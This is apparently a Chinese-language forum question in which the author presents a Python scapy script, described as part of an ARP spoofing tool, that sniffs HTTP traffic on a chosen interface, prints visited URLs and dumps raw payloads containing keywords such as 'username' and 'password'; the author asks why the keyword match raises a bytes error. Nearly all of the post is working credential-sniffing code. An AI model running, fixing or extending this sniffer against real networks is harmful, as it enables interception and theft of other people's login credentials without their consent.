我写了一个简单的ARP欺骗工具。它在http站点上找到登录信息,并显示输入的站点的链接。我的问题是我写了一个for循环来搜索“负载”层中的“用户”,“密码”之类的改进,但是由于我的列表是字符串,所以它给出了字节错误。当我将字符串转换为字节时,在“负载”层中找不到诸如“用户”,“密码”之类的字符串。
#!/usr/bin/env python3
import scapy.all as scapy
import argparse
from scapy.layers import http
def get_argument():
parse = argparse.ArgumentParser()
parse.add_argument("-i", "--interface", dest="interface", help="Your interface name")
options = parse.parse_args()
return options
def sniff(interface):
# prn, call back function every time each packet capture
# store, we do not store data because data pressure to the system
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
print(url)
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword.encode() in load:
print(load)
break
options = get_argument()
sniff(options.interface)